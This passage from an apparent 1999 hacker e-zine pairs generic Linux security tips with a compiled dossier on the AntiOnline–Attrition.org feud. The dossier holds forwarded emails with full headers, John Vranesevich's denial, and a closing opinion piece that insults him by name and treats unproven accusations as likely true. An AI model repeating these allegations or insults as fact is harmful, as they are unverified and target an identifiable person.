(USA) -Homepage: http://www.gocsi.com/conf.htm -- 11th FIRST Conference on Computer Security Incident Handling and Response -Date: June 13-18 (1999) -Location: Brisbane, Australia -Homepage: http://www.first.org/conference/1999/ -- DefCon -Date: July 9-11 (1999) -Location: Las Vegas, Nevada (USA) -Homepage: http://www.defcon.org/ Lord Oak lordoak@thepoison.org ------------------------------ 3.03 --=\\Securing Linux\\=-- (IDG) -- I'll say at the outset that I feel that the title "Securing Linux" is somewhat misleading. It implies that one can somehow go through a series of steps and emerge at the end with a secure Linux system or network. That isn't true. The real intent of this two-part series is to help you improve the security of your system and to get you to think securely. One without the other is unlikely to succeed. Security is a state of mind Ultimately, security isn't something that is achieved as an end goal; it isn't a state. Rather, it's a way of setting up, maintaining , and running an operating system, network, or environment. Secur- ity is a process and a mind-set as well as a condition. It depends on the day-to-day actions of the system or network's users and system administrators. It also depends on the system security not being so intrusive that it encourages users and administrators alike to work around it. MORE COMPUTING INTELLIGENCE IDG.net home page LinuxWorld's home page LinuxWorld free e-mail alerts LinuxWorld features & columns Get Media Grok and The Industry Standard Intelligencer delivered for free Reviews & in-depth info at IDG.net IDG.net's personal news page Year 2000 World Questions about computers? Let IDG.net's editors help you Subscribe to IDG.net's free daily newsletter for IT leaders Search IDG.net in 12 languages News Radio Computerworld Minute Fusion audio primers But you have to start somewhere, and that somewhere is to improve the security of your system as much as possible while still meeting your operational needs. A system that isn't connected to any network or phone lines and is kept in a locked room is reasonably secure -- but it will meet few of your needs. From there we embark on a series of compromises between the best possible security and the least inconvenience and difficulty that will serve our purposes. Some of these tips are specific to Linux systems, but many are very general principles that apply to all systems and networks -- not just to Unix (or Unix-like) OSs. 1.Less is more Applying the Principle of least privilege and the Principle of minimum access ensures that you open up your system to the least amount of risk. Users are allowed only enough privilege and access to do their work, and no more. More... 2.Planning Plan ahead and plan to distribute services. Even before you begin an installation (and, ideally, before you purchase system software solutions), make a detailed plan of your intended security defenses . On paper. More... 3.Installation A secure system starts with a secure install. This is one area where the various Linux distributions fail to do an adequate job. All of the distributions are guilty of making it too easy to set up insecure or misconfigured installations. Many of them enable services that the new user is unlikely to be aware of, or enable services before they are fully configured. More... 4.Secure services Internet and network services are among the most vulnerable parts of your system. Whether you're planning a new installation or reviewing security on an existing system, your file servers, e-mail services, Web servers, FTP, and other network services should be among the first things you check for security holes. More... 5.Up and running Once your system is set up, be sure to keep track of the services you're running. Keep a close eye on services and applications by monitoring your UDP and TCP ports. More... 6.Password and authentication security Passwords can be the most underestimated security feature you have. Make sure that neither you nor your users are using transparent (easily guessed) passwords, and make sure that your passwords are safe from unauthorized intruders. More... 7.Security and the privileged user Never perform routine operations as root! Do your routine work as a nonprivileged user and step up to root only when needed. This is a common mistake of most newbies to Linux (and Unix in general). When you (or a user or a program) must run as root, take the proper security precautions. More... 8.Cryptography and security Cryptography is a good thing. It can protect our files, our e-mail, and our communications. Widespread use of cryptography will improve and change the security landscape. Take advantage of cryptography wherever its use is appropriate. More... 9.Eternal vigilance Once you've secured your installation and checked your basic security and services, your work isn't over. In fact, the job of keeping your system secure is never over. Even if with eternal vigilance, some risk remains, and it may still be possible for someone, sometime to get in. With or without the help of any one of a number of monitoring programs, you must keep a watchful eye on what is going on in your system. More... 10.Stay informed New security holes and bugs are discovered and exploited constantly , and new techniques, patches, and fixes are created to counter the threat they present. The only way to safeguard the system you've worked so hard to secure is to stay on top of new information as it becomes available. More... The enemy within is ignorance While advanced security can be difficult to implement, a great deal can be achieved by taking the simple steps of knowing what you're running and disabling services you aren't sure about. Even small sites and single Linux systems can take steps to reduce the risk and harden their security protection. Not all of these ideas are ideal for all circumstances. You have to understand and balance your security needs, your network design, your functionality needs, and your security policy (if you have one). In any case, knowledge is your best security tool and ignorance is your worst enemy. http://www.cnn.com/TECH/computing/9906/03/linux.ent.idg/ ------------------------------ Here is some information that I have collected from various sites and e-mails about the JP and AntiOnline issues. At the end, this will also contain my opinion and other facts that i have put together. All of these e-mails were taken from www.attrition.org and all credit is given from where it was taken. JP (owner of AntiOnline), is now giving away all of the information he has collected on people to the FBI if they want it or if they want to sign up. We all know that JP has had many interviews (wheather they are true or not, that is another thing), this could be a major problem for some/many people. What he is doing is totally wrong and very immature. He is mainly mad because knowone likes him and things like that. Either that or he is just trying to get attention and to try to make 'new' friends. Well, if it was for media attention, he sure got it, but the main thing is "is it good"? And also is it "Because people are starting to like him and his site?". Well, I will let you figure that out on your own. AO.01 ~[www.wired.com]~ ----------------------- A Web site addressing computer hacking issues has accused a computer security pundit of paying individuals to break into Web servers in exchange for exclusive coverage of the stories that result. John P. Vranesevich, editor of computer security magazine and resource center AntiOnline, denies the charges. Vranesevich is well known in the hacking and cracking community. He is often called on by news media, including Wired News, to provide perspective on Web site break- ins, viruses, and other security issues. A report by the group Attrition.org, released Monday, accuses Vranesevich of paying hackers to break into sites, thus guaranteeing him an exclusive on the stories. "We've never paid for a story," Vranesevich said. "We don't even pay our reporters for stories. [The allegations] are flat-out libelous and there's no proof to it. It's an attempt to destroy, defame, and discredit me." Vranesevich's detractors were already inflamed over his recent apparent shift in allegiance. On Friday, Vranesevich posted an editorial on his Web site that stated he was working with the Air Force and other government agencies to help track down crackers. "A little note to the thousands of hackers that read this site," Vranesevich warned, "I have been watching you these past five years. I know how you do the things you do, why you do the things you do, and I know who you are." His warnings have stirred the ire of attrition.org, led by Brian Martin (who goes by the name Jericho). Martin said he has been following Vranesevich's case for more than a year. Martin based his claims on two emails that allegedly show Vranesevich had a business relationship with "So1o," the hacker accused of breaking into senate.gov last year. Vranesevich said the emails displayed on Martin's site "never existed." ------------- AO.02 ~[E-mails from Attrition]~ -------------------------------- Here are 2 e-mails that Attrition recently recieved. They posted these e-mails on their site, but JP and the rest of AntiOnline are saying they are lies and made up. You can visit Attritions website at: www.attrition.org and I thank them very much for suppling the information that they did. -AO.01A [Email #1] IMPLICATION: Serious questions would arise if it was known that a company was funding a person(s) to create problems in order for them to profit from solutions. By hiring an active hacker responsible for breaking into various systems, and then offering a product to help stop intruders, there is a direct cause/effect relationship that leads to unethical profiting from inflated and false threats of system intrusion. By having said hacker break into a high profile web site, deface the web pages, and then offer 'exclusive' "news", it presents the illusion of accurate and honest reporting, when there was little or no news to begin with. PROOF: This mail from John Vranesevich shows that he and/or AntiOnline IS funding the development of a product called "Local Secure". ---------- Forwarded message ---------- Received: from antionline.com ([209.166.177.36]) by phalse.2600.com (8.8.8/8.8.8) with SMTP id PAA27067 for (bronc@2600.com); Wed, 12 May 1999 15:02:29 -0400 (EDT) Message-Id: <199905121902.PAA27067@phalse.2600.com> Received: from bessie ([209.166.177.43]) by antionline.com ( IA Mail Server Version: 2.3. Build: 10019 ) ) ; 12 May 1999 19:03:17 UT X-Sender: jp@smtp.antionline.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0 Date: Wed, 12 May 1999 15:03:17 -0400 To: Bronc Buster (bronc@2600.com) From: John Vranesevich (jp@AntiOnline.com) Subject: Re: Information In-Reply-To: (Pine.NEB.4.05.9905121444030.26886-100000@phalse.2600.com) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Greetings: Haha, first off. "Local Secure" is a solaris vulnerability scanner that AntiOnline is having commercially developed. ROFL "some secret 'spy' project". We had a small group of programmers contact us about it, it looked cool, so we threw them a few bucks . [snip...] Yours In CyberSpace, John Vranesevich Founder, AntiOnline ------------- -AO.01B [E-mail #2] IMPLICATION: That an active hacker has a significant role in a company offering security solutions. This behavior is an absolute 'no' in the world of security consulting. If it is known that active hackers populate a security team, what guarantees exist that they will behave ethically when doing consulting work on your network? PROOF: The following mail proves that "so1o", a.k.a Chris McNab holds a significant position in Network Security Solutions Ltd. ---------- Forwarded message ---------- Received: from cc02mh.unity.ncsu.edu (cc02mh.unity.ncsu.edu [152.1.1.144]) by cc01mh.unity.ncsu.edu (8.8.7/8.8.7) with ESMTP id MAA22054 for (jkwilli2@cc01mh.unity.ncsu.edu); Sun, 11 Apr 1999 12:22:24 -0400 (EDT) From: chris@ns2.co.uk Received: from netgates.co.uk (macmail.netgates.co.uk [194.105.64.74]) by cc02mh.unity.ncsu.edu (8.8.7/8.8.7) with ESMTP id MAA18125 for (jkwilli2@unity.ncsu.edu); Sun, 11 Apr 1999 12:22:22 -0400 (EDT) Received: from onyx.nss.cx (t@glm001 [193.9.120.4]) by netgates.co.uk (8.7.5/8.x.x) with SMTP id RAA26418 for (jkwilli2@unity.ncsu.edu); Sun, 11 Apr 1999 17:22:29 +0100 (BST) Message-ID: (2BC8B641.5DCB@ns2.co.uk) Date: Sun, 11 Apr 1993 17:22:25 -0700 Organization: http://www.ns2.co.uk/about.html X-Mailer: Mozilla 3.01 (Win95; I; 16bit) MIME-Version: 1.0 To: Ken Williams (jkwilli2@unity.ncsu.edu) Subject: Re: 2.6 md5's References: (Pine.SOL.4.05.9901061816020.10775-100000@ultra1-100lez.eos.ncsu.edu) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-UIDL: 90e8e8bdcef936724ed2ef7fd94a63f1 Hi Ken, Chris (so1o) here again.. just asking for a quick favour (well, 2 mins of work on your part, heh). After some hard-drive difficulties I've been experiencing here, I've been trying to rebuild my exploit/tools collections. I was simply wondering if it would be possible for you to .tgz up the *.c files in the http://www.Genocide2600.com/~tattooman/Exploit_Code_Archive/ directory on your site, I only really need the C source files, this will also keep the .tgz's filesize down :-) I would be _extremely_ grateful if you could hook this up for me, maybe you can put the files on an FTP at ncsu.edu or somewhere fast. Take it easy, Chris -- Chris McNab | Managing Director | Network Security Solutions Ltd. | http://www.ns2.co.uk ------------- AO.03 ~[AntiOnline's Response]~ ------------------------------- First off, for those of you that haven't read it, Brian Martin's Attrition website has today posted allegations that AntiOnline funded the Whitehouse.gov and Senate.gov hack so that we would have news to cover (However, I'm sure most of you have read it by now, because of organizations, and I use the term loosely, like the Hacker News Network). Needless to say, when I went forward with the statement that AntiOnline was going to help in the fight against malicious hackers, I expected some backlash from the hacker community. A few dozen extra hack attempts a day, some synfloods. Maybe I'd find myself with a $10,000 phone bill. But, they've apparently chosen something far more creative. First off, let me say this. Brian Martin (aka Cult_Hero) was raided by the FBI in connection with being a suspected member of the HFG (The group that hacked the New York Times), and Erik Ginorio (BroncBuster) is known, and admits, to breaking into dozens of sites (he calls himself a hacktivist). The fact that these two could think, or at least think up, some grandiose scheme which involved AntiOnline bank- rolling hackers, is not surprising. They have both lived their lives trying to break, and evade, the law. For some reason, Brian Martin has become obsessed over AntiOnline. His website has dozens and dozens of pages of what he calls "errata" that he's written about it. He takes information posted on our site out of context, then criticizes us because of it. Many people have written in asking why we never posted any response to all of the allegations he has on his site about us. Personally, it's because I felt that I didn't need to justify myself, or my actions, to someone who is currently under FBI investigation, and who has never done anything for the security scene other than criticize others. I actually feel bad for him. The fact that he spends such a large portion of his life trying to "bring down" others using lies, deceit, and twistings of the truth, is sad in my eyes. As for these allegations that I paid people to break into government sites so that I could write a story. Let me just say, that such claims are so far fetched and pre- posterous, I'm not even going to respond to them on a point by point basis. It seems that almost all of the criticisms that I receive from people like Brian Martin revolve around money. He says in his "allegations" about AntiOnline that "During the past five years, AO has grown from a five megabyte hobby web site, into a multi domain business venture with hundreds of thousands of dollars in venture capital." Is that what he's so upset about? That I've made a ton of money? Well, let me put his mind at ease. The point in fact, is that I don't now, nor have I ever in my life, had a lot of money. Our venture funding wasn't in the amount of hundreds of thousands of dollars. I am not ashamed to say, and in fact, I'm very proud to say, that our original funding was in the amount of $75,000. I am very proud of the levels I have taken AntiOnline to with very little resources, and a lot of hard work. On average, I put in 17 hour days working on the site and related matters. At the age of 20, I'm trying to build a life long career for myself. So, to people like Mr. Martin, let me just say that anything my site has accomplished has not, and tru- ly couldn't have been, from me throwing money at it. It came from my love for what I do, and my willingness to put in the time it takes to accomplish my dream. In a way, I take these allegations that have come against me as a sign that I'm on the right track with what I'm doing. If people like Brian Martin weren't yelling and screaming about me, I guess I'd take that as a sign that I'm off the beaten path. If people like Brian Martin didn't see me as a threat to them, they wouldn't be yelling So, I'm going to view these recent allegations as a job well done letter from the malicious hackers of the world. I have always lived my life in a way which I was proud of, and I will continue to do so. I will NOT allow people like Brian Martin and Erik Ginorio to cause me to con- stantly be taking some sort of sick defensive on my site (Which is probably what their intentions are). That's not its purpose. So, if they come out with some new allegation, like I have secrets plans to assasinate the president with a herf gun or something, you won't find a response to them from me here. As a matter of fact, you won't find a response from me at all. I will let the work that I put forth, and the actions that I take in my daily life, be my response. Yours In CyberSpace, John Vranesevich Founder, AntiOnline ------------- AO.04 ~[Added Comments]~ ------------------------ Well my opinion on this topic is that JP is being totally immature. He is 'telling' on people. People trusted him (kinda) to let him interview them and now he is releasing all of that information about people. JP is releasing all of that infor- mation to government and military officials. He said that he is 'against' our illegal activity, but yet he claims he is a hacker? Yea OK. So he is a hacker (supposedly), but yet turns on us? Wow, this makes him a trader along with being a liar and immature. He is totally gonna change the community. Now when someone wants to interview a hacker, the hacker is gonna think 'Can I trust him/her?'. So basically there goes MOST/A LOT of the interviews and the information that is supplied about people and what goes on. He is being a total dick and a idiot. Wow, thats 2 more things we can add to the list. The one thing where I get lost is at: what makes a difference if he posts it on his site where everyone can see it (including the government)? It doesn't, he is doing it for the media/attention. Uh oh, we just added media wh0re to the list also! Since we have come up with some characteristics of JP, lets take a look at them: -Immature -Tattle Tale -Hypocriate -Trader -Liar -Dick -Idiot -Media Wh0re Wow thats a lot of things. I am sure I/we can come up with lots more but the server doesn't have 7gigs to spare for a text file. Another reason is that why would i want to waste my time writing up things about JP (characteristics)? I wouldn't want to waste my time on him. Most of you know I am not one to talk trash or bad about other people, but when it comes to things like this, there is no way to help it. When someone is the things listed above (all put together), that shows the person has lack of respect for any- one and is in it all for the money (well greed was just added). I am truely sorry to those who like AntiOnline and go there and wanted to read this section about what I think of this situation. But mainly it is the truth, and there is honestly no way out of it. The only things that MIGHT not be true are the e-mails that were sent to Bronc Buster (posted on attrition), but that has not yet been proven yet. And I personally think that they are true and really from him though they might be modified SOME with things stretched and exagerated. -Lord Oak lordoak@thepoison.org ------------- This portfolio of information about AntiOnline was put together by Lord Oak and every- one was given credit from where I took the information from. Permission is needed before copying this WHOLE AntiOnline document and not giving credit where it is due. Again, I am sorry to those who like AntiOnline and go there and wanted to read this document. But you have your opinions so please let me have mine (if you wanna think this is an opinion). Lord Oak lordoak@thepoison.org ------------------------------ SAY.W -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- . Quote #2- . . . . "Comeon guys, stop it or I am telling!" . . -JayPeeAychEf (JPHF) . . . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Please go to: www.thepoison.org/popup.html and click on our sponsors because we have to pay the bills someway! It doesn't cost you anything (except 10 seconds) to go there and click on it. _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _| _| _| _| _| _| _| Antidote is an HNN Affiliate _| _| http://www.hackernews.com _| _| _| _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission is needed before using.